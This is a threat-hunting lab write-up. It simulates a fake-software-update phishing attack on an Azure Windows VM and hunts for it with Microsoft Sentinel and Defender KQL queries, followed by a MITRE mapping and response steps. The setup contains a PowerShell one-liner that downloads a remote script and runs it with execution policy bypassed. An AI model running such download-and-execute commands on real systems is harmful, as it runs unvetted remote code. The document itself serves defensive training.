- Organization: 🏢 Medium-sized FinTech company.
- Threat: Employees report unusual system behavior after clicking on a suspicious software update notification.
- Objective: Identify the phishing campaign’s scope, mitigate its impact, and strengthen defenses.
📥 The PowerShell Payload

Run the PowerShell command below on your VM after onboarding it to MDE:

```powershell
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/TrevinoParker7/Powershell-test-payload-harmless/refs/heads/main/phishingFakeSoftwareUpdate.ps1' -OutFile 'C:\programdata\phishingFakeSoftwareUpdate.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\phishingFakeSoftwareUpdate.ps1
```

- SIEM: Microsoft Sentinel
- Endpoint Protection: Microsoft Defender for Endpoint
- Query Language: Kusto Query Language (KQL)
- Infrastructure: Windows 10 VMs on Microsoft Azure
Focus Areas:
1️⃣ Check DeviceFileEvents for suspicious file activities.
2️⃣ Check DeviceProcessEvents for signs of malicious execution.
3️⃣ Check DeviceNetworkEvents for outgoing connections, especially over known malicious ports.
Query: Recent File Events

```kql
DeviceFileEvents
| top 50 by Timestamp desc
```

Query: Network Events

```kql
DeviceNetworkEvents
| top 50 by Timestamp desc
```

Query: Process Events

```kql
DeviceProcessEvents
| top 50 by Timestamp desc
```

- TTP: T1193 - Spear Phishing Link
- Event: Employees receive a phishing email mimicking IT with a link to a "critical software update."
- Impact: The link leads to downloading a PowerShell payload.
Relevant Query:

```kql
DeviceFileEvents
| where DeviceName == "tphish"
| where FileName endswith "ps1"
| order by Timestamp desc
```

- TTP: T1059.001 - PowerShell Execution
- Event: Malicious PowerShell script execution on victim devices.
- Query Used:

```kql
let VMName = "tphish";
let specificTime = datetime(2025-01-26T19:01:29.0367754Z);
DeviceProcessEvents
| where Timestamp between ((specificTime - 2m) .. (specificTime + 2m))
| where DeviceName == VMName
| order by Timestamp desc
```

```kql
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "phishingFakeSoftwareUpdate.ps1" or ProcessCommandLine contains "Add-Type -AssemblyName PresentationFramework"
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessAccountName, InitiatingProcessCommandLine
| order by Timestamp desc
```

- TTP: T1071.001 - Web Protocols
- Event: Communication with a C2 server over the internet, potentially exfiltrating credentials.
- Query Used:

```kql
union DeviceNetworkEvents, DeviceProcessEvents
| where Timestamp > ago(6h)
| where RemoteUrl contains "raw.githubusercontent.com" or InitiatingProcessCommandLine has "phishingFakeSoftwareUpdate.ps1"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessCommandLine, FileName, FolderPath, ActionType
| order by Timestamp desc
```

- TTPs:
  - T1210 - Exploitation of Remote Services
1️⃣ Block the malicious domain on the firewall and DNS servers.
2️⃣ Disable compromised user accounts and enforce password resets.
3️⃣ Isolate infected machines from the network.

1️⃣ Deploy updated antivirus signatures to detect and remove the malware.
2️⃣ Conduct system-wide scans using EDR tools.

1️⃣ Restore affected systems from backups.
2️⃣ Re-enable user access after ensuring systems are clean.
- Enhanced SIEM rules for detecting phishing emails.
- Integration of threat intelligence feeds to block new malicious domains.
- Create a Rule to detect this.
- Mandatory phishing training with simulation tests.
- Quick-reference phishing awareness guide shared via email.
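As an added example that is not part of the original write-up, the following Sentinel scheduled-rule query correlates the two observable steps of this scenario on one device: a .ps1 dropped under ProgramData, followed shortly by powershell.exe launched with -ExecutionPolicy Bypass -File against that same script. The 24h lookback and the 10-minute join window are assumptions chosen for illustration.

```kql
// Added detection example (not from the original lab): correlate the payload
// drop with its bypass execution. Assumptions: lookback and window values below.
let lookback = 24h;
let window = 10m;
// 1. A PowerShell script written under ProgramData (the path the payload uses)
let dropped = DeviceFileEvents
    | where Timestamp > ago(lookback)
    | where ActionType in ("FileCreated", "FileModified")
    | where FolderPath startswith @"C:\ProgramData\" and FileName endswith ".ps1"
    | project DropTime = Timestamp, DeviceId, DeviceName, FileName, FolderPath,
              DropInitiator = InitiatingProcessCommandLine;
// 2. powershell.exe started with -ExecutionPolicy Bypass and a -File argument
let executed = DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where FileName =~ "powershell.exe"
    | where ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass", "-File")
    | project ExecTime = Timestamp, DeviceId, ProcessCommandLine, AccountName,
              InitiatingProcessFileName, InitiatingProcessCommandLine;
// 3. Same device, execution inside the window after the drop, and the command
//    line names the dropped script, so a stray .ps1 alone does not alert
dropped
| join kind=inner executed on DeviceId
| where ExecTime between (DropTime .. (DropTime + window))
| where ProcessCommandLine has FileName
| project DropTime, ExecTime, DeviceName, AccountName, FileName, FolderPath,
          ProcessCommandLine, InitiatingProcessFileName, DropInitiator
| order by ExecTime desc
```

When saving this as a scheduled analytics rule, map DeviceName and AccountName to the Host and Account entities so the resulting incident carries the affected device and user.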
| Tactic | Technique | ID | Example |
|---|---|---|---|
| Initial Access | Spear Phishing Link | T1193 | Phishing email with fake update link |
| Execution | PowerShell Execution | T1059.001 | Malicious PowerShell script executed |
| Command & Control | Web Protocols | T1071.001 | C2 communication to exfiltrate data |
| Credential Access | Credentials in Files | T1555.003 | Stolen credentials from payload use |
| Lateral Movement | Exploitation of Remote Services | T1210 | Attempts to pivot to other devices |
---